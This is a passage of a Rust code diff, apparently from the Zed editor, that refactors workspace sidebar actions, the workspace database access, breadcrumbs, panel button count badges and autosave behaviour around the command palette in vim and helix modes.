+ llm_api_token,
}
}
}
@@ -73,7 +55,7 @@ impl WebSearchProvider for CloudWebSearchProvider {
.user_store
.read(cx)
.current_organization()
- .map(|o| o.id.clone());
+ .map(|organization| organization.id.clone());
let body = WebSearchBody { query };
cx.background_spawn(async move {
perform_web_search(client, llm_api_token, organization_id, body).await
@@ -61,12 +61,8 @@ pub fn init(cx: &mut App) {
pub static FILTERED_KEYSTROKES: LazyLock<Vec<Vec<Keystroke>>> = LazyLock::new(|| {
[
// Modifiers on normal vim commands
- "g h",
"g j",
"g k",
- "g l",
- "g $",
- "g ^",
// Duplicate keys with "ctrl" held, e.g. "ctrl-w ctrl-a" is duplicate of "ctrl-w a"
"ctrl-w ctrl-a",
"ctrl-w ctrl-c",
@@ -65,6 +65,7 @@ theme.workspace = true
ui.workspace = true
util.workspace = true
uuid.workspace = true
+vim_mode_setting.workspace = true
zed_actions.workspace = true
[target.'cfg(target_os = "windows")'.dependencies]
@@ -12,8 +12,10 @@ use gpui::{
};
use settings::SettingsStore;
use std::sync::Arc;
-use ui::{ContextMenu, Divider, DividerColor, IconButton, Tooltip, h_flex};
-use ui::{prelude::*, right_click_menu};
+use ui::{
+ ContextMenu, CountBadge, Divider, DividerColor, IconButton, Tooltip, prelude::*,
+ right_click_menu,
+};
use util::ResultExt as _;
pub(crate) const RESIZE_HANDLE_SIZE: Pixels = px(6.);
@@ -909,7 +911,7 @@ impl Render for PanelButtons {
DockPosition::Bottom | DockPosition::Right => (Corner::BottomRight, Corner::TopRight),
};
- let buttons: Vec<_> = dock
+ let mut buttons: Vec<_> = dock
.panel_entries
.iter()
.enumerate()
@@ -940,6 +942,7 @@ impl Render for PanelButtons {
};
let focus_handle = dock.focus_handle(cx);
+ let icon_label = entry.panel.icon_label(window, cx);
Some(
right_click_menu(name)
@@ -973,7 +976,7 @@ impl Render for PanelButtons {
.trigger(move |is_active, _window, _cx| {
// Include active state in element ID to invalidate the cached
// tooltip when panel state changes (e.g., via keyboard shortcut)
- IconButton::new((name, is_active_button as u64), icon)
+ let button = IconButton::new((name, is_active_button as u64), icon)
.icon_size(IconSize::Small)
.toggle_state(is_active_button)
.on_click({
@@ -987,18 +990,32 @@ impl Render for PanelButtons {
this.tooltip(move |_window, cx| {
Tooltip::for_action(tooltip.clone(), &*action, cx)
})
- })
+ });
+
+ div().relative().child(button).when_some(
+ icon_label
+ .clone()
+ .filter(|_| !is_active_button)
+ .and_then(|label| label.parse::<usize>().ok()),
+ |this, count| this.child(CountBadge::new(count)),
+ )
}),
)
})
.collect();
+ if dock_position == DockPosition::Right {
+ buttons.reverse();
+ }
+
let has_buttons = !buttons.is_empty();
h_flex()
.gap_1()
.when(
- has_buttons && dock.position == DockPosition::Bottom,
+ has_buttons
+ && (dock.position == DockPosition::Bottom
+ || dock.position == DockPosition::Right),
|this| this.child(Divider::vertical().color(DividerColor::Border)),
)
.children(buttons)
@@ -7,7 +7,8 @@ use ui::{App, Context};
use util::{ResultExt, paths::PathExt};
use crate::{
- NewWindow, SerializedWorkspaceLocation, WORKSPACE_DB, WorkspaceId, path_list::PathList,
+ NewWindow, SerializedWorkspaceLocation, WorkspaceId, path_list::PathList,
+ persistence::WorkspaceDb,
};
pub fn init(fs: Arc<dyn Fs>, cx: &mut App) {
@@ -40,8 +41,9 @@ impl HistoryManager {
}
fn init(this: Entity<HistoryManager>, fs: Arc<dyn Fs>, cx: &App) {
+ let db = WorkspaceDb::global(cx);
cx.spawn(async move |cx| {
- let recent_folders = WORKSPACE_DB
+ let recent_folders = db
.recent_workspaces_on_disk(fs.as_ref())
.await
.unwrap_or_default()
@@ -102,6 +104,7 @@ impl HistoryManager {
.map(|entry| entry.path.clone())
.collect::<Vec<_>>();
let user_removed = cx.update_jump_list(menus, entries);
+ let db = WorkspaceDb::global(cx);
cx.spawn(async move |this, cx| {
let user_removed = user_removed.await;
if user_removed.is_empty() {
@@ -119,7 +122,7 @@ impl HistoryManager {
}
}) {
for id in deleted_ids.iter() {
- WORKSPACE_DB.delete_workspace_by_id(*id).await.log_err();
+ db.delete_workspace_by_id(*id).await.log_err();
}
}
})
@@ -12,10 +12,11 @@ use client::{Client, proto};
use futures::{StreamExt, channel::mpsc};
use gpui::{
Action, AnyElement, AnyEntity, AnyView, App, AppContext, Context, Entity, EntityId,
- EventEmitter, FocusHandle, Focusable, Font, HighlightStyle, Pixels, Point, Render,
- SharedString, Task, WeakEntity, Window,
+ EventEmitter, FocusHandle, Focusable, Font, Pixels, Point, Render, SharedString, Task,
+ WeakEntity, Window,
};
use language::Capability;
+pub use language::HighlightedText;
use project::{Project, ProjectEntryId, ProjectPath};
pub use settings::{
ActivateOnClose, ClosePosition, RegisterSetting, Settings, SettingsLocation, ShowCloseButton,
@@ -25,7 +26,6 @@ use smallvec::SmallVec;
use std::{
any::{Any, TypeId},
cell::RefCell,
- ops::Range,
path::Path,
rc::Rc,
sync::Arc,
@@ -124,14 +124,6 @@ pub enum ItemEvent {
Edit,
}
-// TODO: Combine this with existing HighlightedText struct?
-#[derive(Debug)]
-pub struct BreadcrumbText {
- pub text: String,
- pub highlights: Option<Vec<(Range<usize>, HighlightStyle)>>,
- pub font: Option<Font>,
-}
-
#[derive(Clone, Copy, Default, Debug)]
pub struct TabContentParams {
pub detail: Option<usize>,
@@ -329,7 +321,7 @@ pub trait Item: Focusable + EventEmitter<Self::Event> + Render + Sized {
ToolbarItemLocation::Hidden
}
- fn breadcrumbs(&self, _cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, _cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
None
}
@@ -548,7 +540,7 @@ pub trait ItemHandle: 'static + Send {
) -> gpui::Subscription;
fn to_searchable_item_handle(&self, cx: &App) -> Option<Box<dyn SearchableItemHandle>>;
fn breadcrumb_location(&self, cx: &App) -> ToolbarItemLocation;
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>>;
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)>;
fn breadcrumb_prefix(&self, window: &mut Window, cx: &mut App) -> Option<gpui::AnyElement>;
fn show_toolbar(&self, cx: &App) -> bool;
fn pixel_position_of_cursor(&self, cx: &App) -> Option<Point<Pixels>>;
@@ -954,15 +946,29 @@ impl<T: Item> ItemHandle for Entity<T> {
// Only trigger autosave if focus has truly left the item.
// If focus is still within the item's hierarchy (e.g., moved to a context menu),
// don't trigger autosave to avoid unwanted formatting and cursor jumps.
- // Also skip autosave if focus moved to a modal (e.g., command palette),
- // since the user is still interacting with the workspace.
let focus_handle = item.item_focus_handle(cx);
- if !focus_handle.contains_focused(window, cx)
- && !workspace.has_active_modal(window, cx)
- {
- Pane::autosave_item(&item, workspace.project.clone(), window, cx)
- .detach_and_log_err(cx);
+ if focus_handle.contains_focused(window, cx) {
+ return;
}
+
+ let vim_mode = vim_mode_setting::VimModeSetting::is_enabled(cx);
+ let helix_mode = vim_mode_setting::HelixModeSetting::is_enabled(cx);
+
+ if vim_mode || helix_mode {
+ // We use the command palette for executing commands in Vim and Helix modes (e.g., `:w`), so
+ // in those cases we don't want to trigger auto-save if the focus has just been transferred
+ // to the command palette.
+ //
+ // This isn't totally perfect, as you could still switch files indirectly via the command
+ // palette (such as by opening up the tab switcher from it and then switching tabs that
+ // way).
+ if workspace.is_active_modal_command_palette(cx) {
+ return;
+ }
+ }
+
+ Pane::autosave_item(&item, workspace.project.clone(), window, cx)
+ .detach_and_log_err(cx);
}
},
)
@@ -1090,7 +1096,7 @@ impl<T: Item> ItemHandle for Entity<T> {
self.read(cx).breadcrumb_location(cx)
}
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
self.read(cx).breadcrumbs(cx)
}
@@ -26,6 +26,15 @@ pub trait ModalView: ManagedView {
fn render_bare(&self) -> bool {
false
}
+
+ /// Returns whether this [`ModalView`] is the command palette.
+ ///
+ /// This breaks the encapsulation of the [`ModalView`] trait a little bit, but there doesn't seem to be an
+ /// immediate, more elegant way to have the workspace know about the command palette (due to dependency arrow
+ /// directions).
+ fn is_command_palette(&self) -> bool {
+ false
+ }
}
trait ModalViewHandle {
@@ -33,6 +42,7 @@ trait ModalViewHandle {
fn view(&self) -> AnyView;
fn fade_out_background(&self, cx: &mut App) -> bool;
fn render_bare(&self, cx: &mut App) -> bool;
+ fn is_command_palette(&self, cx: &App) -> bool;
}
impl<V: ModalView> ModalViewHandle for Entity<V> {
@@ -51,6 +61,10 @@ impl<V: ModalView> ModalViewHandle for Entity<V> {
fn render_bare(&self, cx: &mut App) -> bool {
self.read(cx).render_bare()
}
+
+ fn is_command_palette(&self, cx: &App) -> bool {
+ self.read(cx).is_command_palette()
+ }
}
pub struct ActiveModal {
@@ -189,6 +203,13 @@ impl ModalLayer {
pub fn has_active_modal(&self) -> bool {
self.active_modal.is_some()
}
+
+ /// Returns whether the active modal is the command palette.
+ pub fn is_active_modal_command_palette(&self, cx: &App) -> bool {
+ self.active_modal
+ .as_ref()
+ .map_or(false, |modal| modal.modal.is_command_palette(cx))
+ }
}
impl Render for ModalLayer {
@@ -5,33 +5,37 @@ use gpui::{
ManagedView, MouseButton, Pixels, Render, Subscription, Task, Tiling, Window, WindowId,
actions, deferred, px,
};
-use project::{DisableAiSettings, Project};
+use project::DisableAiSettings;
+#[cfg(any(test, feature = "test-support"))]
+use project::Project;
use settings::Settings;
use std::future::Future;
use std::path::PathBuf;
+use std::sync::Arc;
use ui::prelude::*;
use util::ResultExt;
+use zed_actions::agents_sidebar::MoveWorkspaceToNewWindow;
const SIDEBAR_RESIZE_HANDLE_SIZE: Pixels = px(6.0);
use crate::{
- CloseIntent, CloseWindow, DockPosition, Event as WorkspaceEvent, Item, ModalView, Panel, Toast,
- Workspace, WorkspaceId, client_side_decorations, notifications::NotificationId,
+ CloseIntent, CloseWindow, DockPosition, Event as WorkspaceEvent, Item, ModalView, Panel,
+ Workspace, WorkspaceId, client_side_decorations,
};
actions!(
multi_workspace,
[
- /// Creates a new workspace within the current window.
- NewWorkspaceInWindow,
- /// Switches to the next workspace within the current window.
- NextWorkspaceInWindow,
- /// Switches to the previous workspace within the current window.
- PreviousWorkspaceInWindow,
/// Toggles the workspace switcher sidebar.
ToggleWorkspaceSidebar,
+ /// Closes the workspace sidebar.
+ CloseWorkspaceSidebar,
/// Moves focus to or from the workspace sidebar without closing it.
FocusWorkspaceSidebar,
+ /// Switches to the next workspace.
+ NextWorkspace,
+ /// Switches to the previous workspace.
+ PreviousWorkspace,
]
);
@@ -41,17 +45,16 @@ pub enum MultiWorkspaceEvent {
WorkspaceRemoved(EntityId),
}
-pub enum SidebarEvent {
- Open,
- Close,
-}
-
-pub trait Sidebar: EventEmitter<SidebarEvent> + Focusable + Render + Sized {
+pub trait Sidebar: Focusable + Render + Sized {
fn width(&self, cx: &App) -> Pixels;
fn set_width(&mut self, width: Option<Pixels>, cx: &mut Context<Self>);
fn has_notifications(&self, cx: &App) -> bool;
- fn toggle_recent_projects_popover(&self, window: &mut Window, cx: &mut App);
- fn is_recent_projects_popover_deployed(&self) -> bool;
+
+ fn is_threads_list_view_active(&self) -> bool {
+ true
+ }
+ /// Makes focus reset back to the search editor upon toggling the sidebar from outside
+ fn prepare_for_focus(&mut self, _window: &mut Window, _cx: &mut Context<Self>) {}
}
pub trait SidebarHandle: 'static + Send + Sync {
@@ -59,11 +62,12 @@ pub trait SidebarHandle: 'static + Send + Sync {
fn set_width(&self, width: Option<Pixels>, cx: &mut App);
fn focus_handle(&self, cx: &App) -> FocusHandle;
fn focus(&self, window: &mut Window, cx: &mut App);
+ fn prepare_for_focus(&self, window: &mut Window, cx: &mut App);
fn has_notifications(&self, cx: &App) -> bool;
fn to_any(&self) -> AnyView;
fn entity_id(&self) -> EntityId;
- fn toggle_recent_projects_popover(&self, window: &mut Window, cx: &mut App);
- fn is_recent_projects_popover_deployed(&self, cx: &App) -> bool;
+
+ fn is_threads_list_view_active(&self, cx: &App) -> bool;
}
#[derive(Clone)]
@@ -93,6 +97,10 @@ impl<T: Sidebar> SidebarHandle for Entity<T> {
window.focus(&handle, cx);
}
+ fn prepare_for_focus(&self, window: &mut Window, cx: &mut App) {
+ self.update(cx, |this, cx| this.prepare_for_focus(window, cx));
+ }
+
fn has_notifications(&self, cx: &App) -> bool {
self.read(cx).has_notifications(cx)
}
@@ -105,14 +113,8 @@ impl<T: Sidebar> SidebarHandle for Entity<T> {
Entity::entity_id(self)
}
- fn toggle_recent_projects_popover(&self, window: &mut Window, cx: &mut App) {
- self.update(cx, |this, cx| {
- this.toggle_recent_projects_popover(window, cx);
- });
- }
-
- fn is_recent_projects_popover_deployed(&self, cx: &App) -> bool {
- self.read(cx).is_recent_projects_popover_deployed()
+ fn is_threads_list_view_active(&self, cx: &App) -> bool {
+ self.read(cx).is_threads_list_view_active()
}
}
@@ -122,10 +124,8 @@ pub struct MultiWorkspace {
active_workspace_index: usize,
sidebar: Option<Box<dyn SidebarHandle>>,
sidebar_open: bool,
- _sidebar_subscription: Option<Subscription>,
pending_removal_tasks: Vec<Task<()>>,
_serialize_task: Option<Task<()>>,
- _create_task: Option<Task<()>>,
_subscriptions: Vec<Subscription>,
}
@@ -137,9 +137,6 @@ impl MultiWorkspace {
if let Some(task) = this._serialize_task.take() {
task.detach();
}
- if let Some(task) = this._create_task.take() {
- task.detach();
- }
for task in std::mem::take(&mut this.pending_removal_tasks) {
task.detach();
}
@@ -158,10 +155,8 @@ impl MultiWorkspace {
active_workspace_index: 0,
sidebar: None,
sidebar_open: false,
- _sidebar_subscription: None,
pending_removal_tasks: Vec::new(),
_serialize_task: None,
- _create_task: None,
_subscriptions: vec![
release_subscription,
quit_subscription,
@@ -170,21 +165,24 @@ impl MultiWorkspace {
}
}
- pub fn register_sidebar<T: Sidebar>(
- &mut self,
- sidebar: Entity<T>,
- window: &mut Window,
- cx: &mut Context<Self>,
- ) {
- let subscription =
- cx.subscribe_in(&sidebar, window, |this, _, event, window, cx| match event {
- SidebarEvent::Open => this.toggle_sidebar(window, cx),
- SidebarEvent::Close => {
- this.close_sidebar(window, cx);
+ pub fn register_sidebar<T: Sidebar>(&mut self, sidebar: Entity<T>, cx: &mut Context<Self>) {
+ self._subscriptions
+ .push(cx.observe(&sidebar, |this, _, cx| {
+ let has_notifications = this.sidebar_has_notifications(cx);
+ let is_open = this.sidebar_open;
+ let show_toggle = this.multi_workspace_enabled(cx);
+ for workspace in &this.workspaces {
+ workspace.update(cx, |workspace, cx| {
+ workspace.set_workspace_sidebar_open(
+ is_open,
+ has_notifications,
+ show_toggle,
+ cx,
+ );
+ });
}
- });
+ }));
self.sidebar = Some(Box::new(sidebar));
- self._sidebar_subscription = Some(subscription);
}
pub fn sidebar(&self) -> Option<&dyn SidebarHandle> {
@@ -192,7 +190,7 @@ impl MultiWorkspace {
}
pub fn sidebar_open(&self) -> bool {
- self.sidebar_open && self.sidebar.is_some()
+ self.sidebar_open
}
pub fn sidebar_has_notifications(&self, cx: &App) -> bool {
@@ -201,16 +199,10 @@ impl MultiWorkspace {
.map_or(false, |s| s.has_notifications(cx))
}
- pub fn toggle_recent_projects_popover(&self, window: &mut Window, cx: &mut App) {
- if let Some(sidebar) = &self.sidebar {
- sidebar.toggle_recent_projects_popover(window, cx);
- }
- }
-
- pub fn is_recent_projects_popover_deployed(&self, cx: &App) -> bool {
+ pub fn is_threads_list_view_active(&self, cx: &App) -> bool {
self.sidebar
.as_ref()
- .map_or(false, |s| s.is_recent_projects_popover_deployed(cx))
+ .map_or(false, |s| s.is_threads_list_view_active(cx))
}
pub fn multi_workspace_enabled(&self, cx: &App) -> bool {
@@ -227,11 +219,22 @@ impl MultiWorkspace {
} else {
self.open_sidebar(cx);
if let Some(sidebar) = &self.sidebar {
+ sidebar.prepare_for_focus(window, cx);
sidebar.focus(window, cx);
}
}
}
+ pub fn close_sidebar_action(&mut self, window: &mut Window, cx: &mut Context<Self>) {
+ if !self.multi_workspace_enabled(cx) {
+ return;
+ }
+
+ if self.sidebar_open {
+ self.close_sidebar(window, cx);
+ }
+ }
+
pub fn focus_sidebar(&mut self, window: &mut Window, cx: &mut Context<Self>) {
if !self.multi_workspace_enabled(cx) {
return;
@@ -248,11 +251,13 @@ impl MultiWorkspace {
let pane_focus = pane.read(cx).focus_handle(cx);
window.focus(&pane_focus, cx);
} else if let Some(sidebar) = &self.sidebar {
+ sidebar.prepare_for_focus(window, cx);
sidebar.focus(window, cx);
}
} else {
self.open_sidebar(cx);
if let Some(sidebar) = &self.sidebar {
+ sidebar.prepare_for_focus(window, cx);
sidebar.focus(window, cx);
}
}
@@ -260,20 +265,27 @@ impl MultiWorkspace {
pub fn open_sidebar(&mut self, cx: &mut Context<Self>) {
self.sidebar_open = true;
+ let sidebar_focus_handle = self.sidebar.as_ref().map(|s| s.focus_handle(cx));
+ let has_notifications = self.sidebar_has_notifications(cx);
+ let show_toggle = self.multi_workspace_enabled(cx);
for workspace in &self.workspaces {
workspace.update(cx, |workspace, cx| {
- workspace.set_workspace_sidebar_open(true, cx);
+ workspace.set_workspace_sidebar_open(true, has_notifications, show_toggle, cx);
+ workspace.set_sidebar_focus_handle(sidebar_focus_handle.clone());
});
}
self.serialize(cx);
cx.notify();
}
- fn close_sidebar(&mut self, window: &mut Window, cx: &mut Context<Self>) {
+ pub fn close_sidebar(&mut self, window: &mut Window, cx: &mut Context<Self>) {
self.sidebar_open = false;
+ let has_notifications = self.sidebar_has_notifications(cx);
+ let show_toggle = self.multi_workspace_enabled(cx);
for workspace in &self.workspaces {
workspace.update(cx, |workspace, cx| {
- workspace.set_workspace_sidebar_open(false, cx);
+ workspace.set_workspace_sidebar_open(false, has_notifications, show_toggle, cx);
+ workspace.set_sidebar_focus_handle(None);
});
}
let pane = self.workspace().read(cx).active_pane().clone();
@@ -318,10 +330,6 @@ impl MultiWorkspace {
.detach();
}
- pub fn is_sidebar_open(&self) -> bool {
- self.sidebar_open
- }
-
pub fn workspace(&self) -> &Entity<Workspace> {
&self.workspaces[self.active_workspace_index]
}
@@ -372,8 +380,12 @@ impl MultiWorkspace {
index
} else {
if self.sidebar_open {
+ let sidebar_focus_handle = self.sidebar.as_ref().map(|s| s.focus_handle(cx));
+ let has_notifications = self.sidebar_has_notifications(cx);
+ let show_toggle = self.multi_workspace_enabled(cx);
workspace.update(cx, |workspace, cx| {
- workspace.set_workspace_sidebar_open(true, cx);
+ workspace.set_workspace_sidebar_open(true, has_notifications, show_toggle, cx);
+ workspace.set_sidebar_focus_handle(sidebar_focus_handle);
});
}
Self::subscribe_to_workspace(&workspace, cx);
@@ -399,22 +411,27 @@ impl MultiWorkspace {
cx.notify();
}
- pub fn activate_next_workspace(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- if self.workspaces.len() > 1 {
- let next_index = (self.active_workspace_index + 1) % self.workspaces.len();
- self.activate_index(next_index, window, cx);
+ fn cycle_workspace(&mut self, delta: isize, window: &mut Window, cx: &mut Context<Self>) {
+ let count = self.workspaces.len() as isize;
+ if count <= 1 {
+ return;
}
+ let current = self.active_workspace_index as isize;
+ let next = ((current + delta).rem_euclid(count)) as usize;
+ self.activate_index(next, window, cx);
}
- pub fn activate_previous_workspace(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- if self.workspaces.len() > 1 {
- let prev_index = if self.active_workspace_index == 0 {
- self.workspaces.len() - 1
- } else {
- self.active_workspace_index - 1
- };
- self.activate_index(prev_index, window, cx);
- }
+ fn next_workspace(&mut self, _: &NextWorkspace, window: &mut Window, cx: &mut Context<Self>) {
+ self.cycle_workspace(1, window, cx);
+ }
+
+ fn previous_workspace(
+ &mut self,
+ _: &PreviousWorkspace,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.cycle_workspace(-1, window, cx);
}
fn serialize(&mut self, cx: &mut App) {
@@ -423,8 +440,9 @@ impl MultiWorkspace {
active_workspace_id: self.workspace().read(cx).database_id(),
sidebar_open: self.sidebar_open,
};
+ let kvp = db::kvp::KeyValueStore::global(cx);
self._serialize_task = Some(cx.background_spawn(async move {
- crate::persistence::write_multi_workspace_state(window_id, state).await;
+ crate::persistence::write_multi_workspace_state(&kvp, window_id, state).await;
}));
}
@@ -440,9 +458,6 @@ impl MultiWorkspace {
if let Some(task) = self._serialize_task.take() {
tasks.push(task);
}
- if let Some(task) = self._create_task.take() {
- tasks.push(task);
- }
tasks.extend(std::mem::take(&mut self.pending_removal_tasks));
async move {
@@ -545,15 +560,10 @@ impl MultiWorkspace {
}
pub fn take_pending_removal_tasks(&mut self) -> Vec<Task<()>> {
- let mut tasks: Vec<Task<()>> = std::mem::take(&mut self.pending_removal_tasks)
+ let tasks: Vec<Task<()>> = std::mem::take(&mut self.pending_removal_tasks)
.into_iter()
.filter(|task| !task.is_ready())
.collect();
- if let Some(task) = self._create_task.take() {
- if !task.is_ready() {
- tasks.push(task);
- }
- }
tasks
}
@@ -582,10 +592,12 @@ impl MultiWorkspace {
workspace
}
- pub fn create_workspace(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- if !self.multi_workspace_enabled(cx) {
- return;
- }
+ #[cfg(any(test, feature = "test-support"))]
+ pub fn create_test_workspace(
+ &mut self,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Task<()> {
let app_state = self.workspace().read(cx).app_state().clone();
let project = Project::local(
app_state.client.clone(),
@@ -602,58 +614,38 @@ impl MultiWorkspace {
self.focus_active_workspace(window, cx);
let weak_workspace = new_workspace.downgrade();
- self._create_task = Some(cx.spawn_in(window, async move |this, cx| {
- let result = crate::persistence::DB.next_id().await;
- this.update_in(cx, |this, window, cx| match result {
- Ok(workspace_id) => {
- if let Some(workspace) = weak_workspace.upgrade() {
- let session_id = workspace.read(cx).session_id();
- let window_id = window.window_handle().window_id().as_u64();
- workspace.update(cx, |workspace, _cx| {
- workspace.set_database_id(workspace_id);
- });
- cx.background_spawn(async move {
- crate::persistence::DB
- .set_session_binding(workspace_id, session_id, Some(window_id))
- .await
- .log_err();
- })
- .detach();
- } else {
- cx.background_spawn(async move {
- crate::persistence::DB
- .delete_workspace_by_id(workspace_id)
- .await
- .log_err();
- })
- .detach();
- }
- this.serialize(cx);
- }
- Err(error) => {
- log::error!("Failed to create workspace: {error:#}");
- if let Some(index) = weak_workspace
- .upgrade()
- .and_then(|w| this.workspaces.iter().position(|ws| *ws == w))
- {
- this.remove_workspace(index, window, cx);
- }
- this.workspace().update(cx, |workspace, cx| {
- let id = NotificationId::unique::<MultiWorkspace>();
- workspace.show_toast(
- Toast::new(id, format!("Failed to create workspace: {error}")),
- cx,
- );
+ let db = crate::persistence::WorkspaceDb::global(cx);
+ cx.spawn_in(window, async move |this, cx| {
+ let workspace_id = db.next_id().await.unwrap();
+ let workspace = weak_workspace.upgrade().unwrap();
+ let task: Task<()> = this
+ .update_in(cx, |this, window, cx| {
+ let session_id = workspace.read(cx).session_id();
+ let window_id = window.window_handle().window_id().as_u64();
+ workspace.update(cx, |workspace, _cx| {
+ workspace.set_database_id(workspace_id);
});
- }
- })
- .log_err();
- }));
+ this.serialize(cx);
+ let db = db.clone();
+ cx.background_spawn(async move {
+ db.set_session_binding(workspace_id, session_id, Some(window_id))
+ .await
+ .log_err();
+ })
+ })
+ .unwrap();
+ task.await
+ })
}
- pub fn remove_workspace(&mut self, index: usize, window: &mut Window, cx: &mut Context<Self>) {
+ pub fn remove_workspace(
+ &mut self,
+ index: usize,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Option<Entity<Workspace>> {
if self.workspaces.len() <= 1 || index >= self.workspaces.len() {
- return;
+ return None;
}
let removed_workspace = self.workspaces.remove(index);
@@ -664,12 +656,24 @@ impl MultiWorkspace {
self.active_workspace_index -= 1;
}
+ // Clear session_id and cancel any in-flight serialization on the
+ // removed workspace. Without this, a pending throttle timer from
+ // `serialize_workspace` could fire and write the old session_id
+ // back to the DB, resurrecting the workspace on next launch.
+ removed_workspace.update(cx, |workspace, _cx| {
+ workspace.session_id.take();
+ workspace._schedule_serialize_workspace.take();
+ workspace._serialize_workspace_task.take();
+ });
+
if let Some(workspace_id) = removed_workspace.read(cx).database_id() {
+ let db = crate::persistence::WorkspaceDb::global(cx);
self.pending_removal_tasks.retain(|task| !task.is_ready());
self.pending_removal_tasks
.push(cx.background_spawn(async move {
- crate::persistence::DB
- .delete_workspace_by_id(workspace_id)
+ // Clear the session binding instead of deleting the row so
+ // the workspace still appears in the recent-projects list.
+ db.set_session_binding(workspace_id, None, None)
.await
.log_err();
}));
@@ -682,6 +686,49 @@ impl MultiWorkspace {
));
cx.emit(MultiWorkspaceEvent::ActiveWorkspaceChanged);
cx.notify();
+
+ Some(removed_workspace)
+ }
+
+ pub fn move_workspace_to_new_window(
+ &mut self,
+ index: usize,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ if self.workspaces.len() <= 1 || index >= self.workspaces.len() {
+ return;
+ }
+
+ let Some(workspace) = self.remove_workspace(index, window, cx) else {
+ return;
+ };
+
+ let app_state: Arc<crate::AppState> = workspace.read(cx).app_state().clone();
+
+ cx.defer(move |cx| {
+ let options = (app_state.build_window_options)(None, cx);
+
+ let Ok(window) = cx.open_window(options, |window, cx| {
+ cx.new(|cx| MultiWorkspace::new(workspace, window, cx))
+ }) else {
+ return;
+ };
+
+ let _ = window.update(cx, |_, window, _| {
+ window.activate_window();
+ });
+ });
+ }
+
+ fn move_active_workspace_to_new_window(
+ &mut self,
+ _: &MoveWorkspaceToNewWindow,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ let index = self.active_workspace_index;
+ self.move_workspace_to_new_window(index, window, cx);
}
pub fn open_project(
@@ -689,7 +736,7 @@ impl MultiWorkspace {
paths: Vec<PathBuf>,
window: &mut Window,
cx: &mut Context<Self>,
- ) -> Task<Result<()>> {
+ ) -> Task<Result<Entity<Workspace>>> {
let workspace = self.workspace().clone();
if self.multi_workspace_enabled(cx) {
@@ -710,7 +757,7 @@ impl MultiWorkspace {
})?
.await
} else {
- Ok(())
+ Ok(workspace)
}
})
}
@@ -721,7 +768,7 @@ impl Render for MultiWorkspace {
fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
let multi_workspace_enabled = self.multi_workspace_enabled(cx);
- let sidebar: Option<AnyElement> = if multi_workspace_enabled && self.sidebar_open {
+ let sidebar: Option<AnyElement> = if multi_workspace_enabled && self.sidebar_open() {
self.sidebar.as_ref().map(|sidebar_handle| {
let weak = cx.weak_entity();
@@ -784,32 +831,25 @@ impl Render for MultiWorkspace {
.font(ui_font)
.text_color(text_color)
.on_action(cx.listener(Self::close_window))
- .on_action(
- cx.listener(|this: &mut Self, _: &NewWorkspaceInWindow, window, cx| {
- this.create_workspace(window, cx);
- }),
- )
- .on_action(
- cx.listener(|this: &mut Self, _: &NextWorkspaceInWindow, window, cx| {
- this.activate_next_workspace(window, cx);
- }),
- )
- .on_action(cx.listener(
- |this: &mut Self, _: &PreviousWorkspaceInWindow, window, cx| {
- this.activate_previous_workspace(window, cx);
- },
- ))
.when(self.multi_workspace_enabled(cx), |this| {
this.on_action(cx.listener(
|this: &mut Self, _: &ToggleWorkspaceSidebar, window, cx| {
this.toggle_sidebar(window, cx);
},
))
+ .on_action(cx.listener(
+ |this: &mut Self, _: &CloseWorkspaceSidebar, window, cx| {
+ this.close_sidebar_action(window, cx);
+ },
+ ))
.on_action(cx.listener(
|this: &mut Self, _: &FocusWorkspaceSidebar, window, cx| {
this.focus_sidebar(window, cx);
},
))
+ .on_action(cx.listener(Self::next_workspace))
+ .on_action(cx.listener(Self::previous_workspace))
+ .on_action(cx.listener(Self::move_active_workspace_to_new_window))
})
.when(
self.sidebar_open() && self.multi_workspace_enabled(cx),
@@ -837,7 +877,7 @@ impl Render for MultiWorkspace {
window,
cx,
Tiling {
- left: multi_workspace_enabled && self.sidebar_open,
+ left: multi_workspace_enabled && self.sidebar_open(),
..Tiling::default()
},
)
@@ -876,7 +916,7 @@ mod tests {
multi_workspace.update_in(cx, |mw, _window, cx| {
mw.open_sidebar(cx);
- assert!(mw.is_sidebar_open());
+ assert!(mw.sidebar_open());
});
cx.update(|_window, cx| {
@@ -886,7 +926,7 @@ mod tests {
multi_workspace.read_with(cx, |mw, cx| {
assert!(
- !mw.is_sidebar_open(),
+ !mw.sidebar_open(),
"Sidebar should be closed when disable_ai is true"
);
assert!(
@@ -900,7 +940,7 @@ mod tests {
});
multi_workspace.read_with(cx, |mw, _cx| {
assert!(
- !mw.is_sidebar_open(),
+ !mw.sidebar_open(),
"Sidebar should remain closed when toggled with disable_ai true"
);
});
@@ -916,7 +956,7 @@ mod tests {
"Multi-workspace should be enabled after re-enabling AI"
);
assert!(
- !mw.is_sidebar_open(),
+ !mw.sidebar_open(),
"Sidebar should still be closed after re-enabling AI (not auto-opened)"
);
});
@@ -926,7 +966,7 @@ mod tests {
});
multi_workspace.read_with(cx, |mw, _cx| {
assert!(
- mw.is_sidebar_open(),
+ mw.sidebar_open(),
"Sidebar should open when toggled after re-enabling AI"
);
});
@@ -234,6 +234,14 @@ impl Workspace {
self.suppressed_notifications.insert(id.clone());
}
+ pub fn is_notification_suppressed(&self, notification_id: NotificationId) -> bool {
+ self.suppressed_notifications.contains(&notification_id)
+ }
+
+ pub fn unsuppress(&mut self, notification_id: NotificationId) {
+ self.suppressed_notifications.remove(&notification_id)
+ }
+
pub fn show_initial_notifications(&mut self, cx: &mut Context<Self>) {
// Allow absence of the global so that tests don't need to initialize it.
let app_notifications = GLOBAL_APP_NOTIFICATIONS
